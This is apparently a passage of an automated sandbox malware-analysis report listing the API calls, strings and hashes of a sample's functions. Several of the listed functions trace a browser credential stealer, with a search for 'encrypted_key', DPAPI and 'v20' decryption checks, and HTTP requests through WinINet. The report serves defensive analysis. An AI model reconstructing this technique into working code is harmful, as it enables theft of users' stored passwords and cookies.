                                                                                                                                              • PK11_SignatureLen.NSS3(?), ref: 6C714D80
                                                                                                                                              • PORT_Alloc_Util.NSS3(00000000), ref: 6C714D95
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C714DF2
                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C714E2C
                                                                                                                                              • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C714E43
                                                                                                                                              • PORT_NewArena_Util.NSS3(00000800), ref: 6C714E58
                                                                                                                                              • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C714E85
                                                                                                                                              • DER_Encode_Util.NSS3(?,?,6C8605A4,00000000), ref: 6C714EA7
                                                                                                                                              • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C714F17
                                                                                                                                              • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C714F45
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C714F62
                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C714F7A
                                                                                                                                              • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C714F89
                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C714FC8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2843999940-0
                                                                                                                                              • Opcode ID: 42dbf3fc75613c57e6f0d2b0d47834e2cc6edf08746c9e6e497b3694213b1203
                                                                                                                                              • Instruction ID: cb67e5d9e4648986da3ddf1722b920506a9be8e2cedbf489923b9ba56acbce98
                                                                                                                                              • Opcode Fuzzy Hash: 42dbf3fc75613c57e6f0d2b0d47834e2cc6edf08746c9e6e497b3694213b1203
                                                                                                                                              • Instruction Fuzzy Hash: C181A271908301AFE711CF25DA44B5AB7E8AB8475CF1C852DF958DBB40E731EA08CB92
                                                                                                                                              Function 6C755C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C755C9B
                                                                                                                                              • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C755CF4
                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C755CFD
                                                                                                                                              • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C755D42
                                                                                                                                              • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C755D4E
                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C755D78
                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C755E18
                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6C755E5E
                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 6C755E72
                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6C755E8B
                                                                                                                                                • Part of subcall function 6C74F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C74F854
                                                                                                                                                • Part of subcall function 6C74F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C74F868
                                                                                                                                                • Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C74F882
                                                                                                                                                • Part of subcall function 6C74F820: free.MOZGLUE(04C483FF,?,?), ref: 6C74F889
                                                                                                                                                • Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C74F8A4
                                                                                                                                                • Part of subcall function 6C74F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C74F8AB
                                                                                                                                                • Part of subcall function 6C74F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C74F8C9
                                                                                                                                                • Part of subcall function 6C74F820: free.MOZGLUE(280F10EC,?,?), ref: 6C74F8D0
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                              • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                              • API String ID: 2028831712-1373489631
                                                                                                                                              • Opcode ID: 6fdfc4c4bcf87b119f6eae8469b0995be576a2c9802b9775b7103276692051ee
                                                                                                                                              • Instruction ID: b77a3869ba8418b6c6c1ff8eb975d92e0de3d2116c8beeec4c382c5e3ae2cdfd
                                                                                                                                              • Opcode Fuzzy Hash: 6fdfc4c4bcf87b119f6eae8469b0995be576a2c9802b9775b7103276692051ee
                                                                                                                                              • Instruction Fuzzy Hash: 787117F1F042019BEB419F25EE4976A3279AF4531CF944039E8099AB42EF36E935C7D2
                                                                                                                                              Function 00415510 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 138stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                • Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                                                                                • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,009A2060), ref: 00406353
                                                                                                                                                • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                                                                                • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,009A1500,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                                                                                • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                                                                                • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                                                                                • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415568
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 0041557F
                                                                                                                                                • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                              • StrStrA.SHLWAPI(00000000,00000000), ref: 004155B4
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 004155D3
                                                                                                                                              • strtok.MSVCRT(00000000,?), ref: 004155EE
                                                                                                                                              • lstrlenA.KERNEL32(00000000), ref: 004155FE
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$lXA
                                                                                                                                              • API String ID: 3532888709-2643084821
                                                                                                                                              • Opcode ID: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                                                                                                                              • Instruction ID: 990a636b304bf614e487c778196146b6daa8d27d3f5f6fae7c13381180e093e6
                                                                                                                                              • Opcode Fuzzy Hash: 7d0e704c8274934bc83e00dd7add74e71fd461374d3639c644432f9ec1b66709
                                                                                                                                              • Instruction Fuzzy Hash: B7518030A11148EBCB14FF61DDA6AED7339AF10354F50442EF50A671A1EF386B94CB5A
                                                                                                                                              Function 6C746C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C74781D,00000000,6C73BE2C,?,6C746B1D,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C40
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C74781D,?,6C73BE2C,?), ref: 6C746C58
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C74781D), ref: 6C746C6F
                                                                                                                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C746C84
                                                                                                                                              • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C746C96
                                                                                                                                                • Part of subcall function 6C6F1240: TlsGetValue.KERNEL32(00000040,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1267
                                                                                                                                                • Part of subcall function 6C6F1240: EnterCriticalSection.KERNEL32(?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F127C
                                                                                                                                                • Part of subcall function 6C6F1240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F1291
                                                                                                                                                • Part of subcall function 6C6F1240: PR_Unlock.NSS3(?,?,?,?,6C6F116C,NSPR_LOG_MODULES), ref: 6C6F12A0
                                                                                                                                              • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C746CAA
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_6c680000_WGo3ga1AL9.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                              • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                              • API String ID: 4221828374-3736768024
                                                                                                                                              • Opcode ID: 84b2917be4ffacaea9436494f41bd28f884138ed1d235f1cdfefac691080bf3b
                                                                                                                                              • Instruction ID: 8ebe95bf0ff7fd2ca86c7e9179bfbc79ee6dbf489be15518fd368867161c1d61
                                                                                                                                              • Opcode Fuzzy Hash: 84b2917be4ffacaea9436494f41bd28f884138ed1d235f1cdfefac691080bf3b
                                                                                                                                              • Instruction Fuzzy Hash: BD01A7E170231527F56027796F49F26395D9F4265CF544832FE08E0A42EAD6E614C0A5
                                                                                                                                              Function 00411520 Relevance: 19.8, APIs: 13, Instructions: 308stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • strtok_s.MSVCRT ref: 00411557
                                                                                                                                              • strtok_s.MSVCRT ref: 004119A0
                                                                                                                                                • Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,009996C0,?,004210F4,?,00000000), ref: 0041AB3B
                                                                                                                                                • Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: strtok_s$lstrcpylstrlen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 348468850-0
                                                                                                                                              • Opcode ID: bda9ece019fec45989a0fac33e763ec2645a230b38903ad477536e26a0420bf4
                                                                                                                                              • Instruction ID: 972b35e280e46cb9f8f2efccef7ae82ad5cc4b0fb079cf0b80f28d4141883f35
                                                                                                                                              • Opcode Fuzzy Hash: bda9ece019fec45989a0fac33e763ec2645a230b38903ad477536e26a0420bf4
                                                                                                                                              • Instruction Fuzzy Hash: 98C1D1B5A011089BCB14EF60DC99FDA7379AF58308F00449EF509A7282EB34EAD5CF95
                                                                                                                                              Function 004144D0 Relevance: 19.7, APIs: 13, Instructions: 202stringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • memset.MSVCRT ref: 004144EE
                                                                                                                                              • memset.MSVCRT ref: 00414505
                                                                                                                                                • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 0041453C
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0600), ref: 0041455B
                                                                                                                                              • lstrcatA.KERNEL32(?,?), ref: 0041456F
                                                                                                                                              • lstrcatA.KERNEL32(?,009A0450), ref: 00414583
                                                                                                                                                • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                                                                • Part of subcall function 0040A430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0040A489
                                                                                                                                                • Part of subcall function 0040A430: memcmp.MSVCRT(?,DPAPI,00000005), ref: 0040A4E2
                                                                                                                                                • Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
                                                                                                                                                • Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
                                                                                                                                                • Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
                                                                                                                                                • Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
                                                                                                                                                • Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
                                                                                                                                                • Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA
                                                                                                                                                • Part of subcall function 00419550: GlobalAlloc.KERNEL32(00000000,0041462D,0041462D), ref: 00419563
                                                                                                                                              • StrStrA.SHLWAPI(?,009A0738), ref: 00414643
                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 00414762
                                                                                                                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A23F
                                                                                                                                                • Part of subcall function 0040A210: LocalAlloc.KERNEL32(00000040,?,?,?,00404F3E,00000000,?), ref: 0040A251
                                                                                                                                                • Part of subcall function 0040A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O@,00000000,00000000), ref: 0040A27A
                                                                                                                                                • Part of subcall function 0040A210: LocalFree.KERNEL32(?,?,?,?,00404F3E,00000000,?), ref: 0040A28F
                                                                                                                                                • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                              • lstrcatA.KERNEL32(?,00000000), ref: 004146F3
                                                                                                                                              • StrCmpCA.SHLWAPI(?,004208D2), ref: 00414710
                                                                                                                                              • lstrcatA.KERNEL32(00000000,00000000), ref: 00414722
                                                                                                                                              • lstrcatA.KERNEL32(00000000,?), ref: 00414735
                                                                                                                                              • lstrcatA.KERNEL32(00000000,00420FA0), ref: 00414744
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2312969222.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000004E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2312969222.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_WGo3ga1AL9.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1191620704-0
                                                                                                                                              • Opcode ID: 011e4ea173f0192533f32a7e50ccf1eae9d7a4310398b83163c7fce0874e5724
                                                                                                                                              • Instruction ID: a18e5ba717d90c20c2426d83a13a237c0a2f648a3df755456e30f39b11c63a78
                                                                                                                                              • Opcode Fuzzy Hash: 011e4ea173f0192533f32a7e50ccf1eae9d7a4310398b83163c7fce0874e5724
                                                                                                                                              • Instruction Fuzzy Hash: B77157B6D00218ABDB14EBA0DD45FDE737AAF88304F00459DF505A6191EB38EB94CF55
                                                                                                                                              Function 6C754E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • PR_SetErrorText.NSS3(00000000,00000000,?,6C7178F8), ref: 6C754E6D
                                                                                                                                                • Part of subcall function 6C6F09E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C6F06A2,00000000,?), ref: 6C6F09F8
                                                                                                                                                • Part of subcall function 6C6F09E0: malloc.MOZGLUE(0000001F), ref: 6C6F0A18
                                                                                                                                                • Part of subcall function 6C6F09E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C6F0A33
                                                                                                                                              • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C7178F8), ref: 6C754ED9
                                                                                                                                                • Part of subcall function 6C745920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C747703,?,00000000,00000000), ref: 6C745942
                                                                                                                                                • Part of subcall function 6C745920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C747703), ref: 6C745954
                                                                                                                                                • Part of subcall function 6C745920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C74596A
                                                                                                                                                • Part of subcall function 6C745920: SECOID_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C745984
                                                                                                                                                • Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(disallow,00000000), ref: 6C745999
                                                                                                                                                • Part of subcall function 6C745920: free.MOZGLUE(00000000), ref: 6C7459BA
                                                                                                                                                • Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(allow,00000000), ref: 6C7459D3
                                                                                                                                                • Part of subcall function 6C745920: free.MOZGLUE(00000000), ref: 6C7459F5
                                                                                                                                                • Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(disable,00000000), ref: 6C745A0A
                                                                                                                                                • Part of subcall function 6C745920: free.MOZGLUE(00000000), ref: 6C745A2E
                                                                                                                                                • Part of subcall function 6C745920: NSSUTIL_ArgGetParamValue.NSS3(enable,00000000), ref: 6C745A43
                                                                                                                                              • SECMOD_FindModule.NSS3(?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754EB3
                                                                                                                                                • Part of subcall function 6C754820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C754EB8,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75484C
                                                                                                                                                • Part of subcall function 6C754820: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C754EB8,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75486D
                                                                                                                                                • Part of subcall function 6C754820: PR_SetError.NSS3(FFFFE09A,00000000,00000000,-00000001,00000000,?,6C754EB8,?), ref: 6C754884
                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754EC0
                                                                                                                                                • Part of subcall function 6C754470: TlsGetValue.KERNEL32(00000000,?,6C717296,00000000), ref: 6C754487
                                                                                                                                                • Part of subcall function 6C754470: EnterCriticalSection.KERNEL32(?,?,?,6C717296,00000000), ref: 6C7544A0
                                                                                                                                                • Part of subcall function 6C754470: PR_Unlock.NSS3(?,?,?,?,6C717296,00000000), ref: 6C7544BB
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F16
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F2E
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F40
                                                                                                                                              • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F6C
                                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F80
                                                                                                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C754F8F
                                                                                                                                              • PK11_UpdateSlotAttribute.NSS3(?,6C82DCB0,00000000), ref: 6C754FFE
                                                                                                                                              • PK11_UserDisableSlot.NSS3(0000001E), ref: 6C75501F
                                                                                                                                              • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6C7178F8), ref: 6C75506B
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2332188113.000000006C681000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C680000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2332164972.000000006C680000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332343507.000000006C81F000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332459599.000000006C85E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332537723.000000006C85F000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332576186.000000006C860000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2332712093.000000006C865000.00000002.00000001.01000000.0000000F.sdmpDownload File
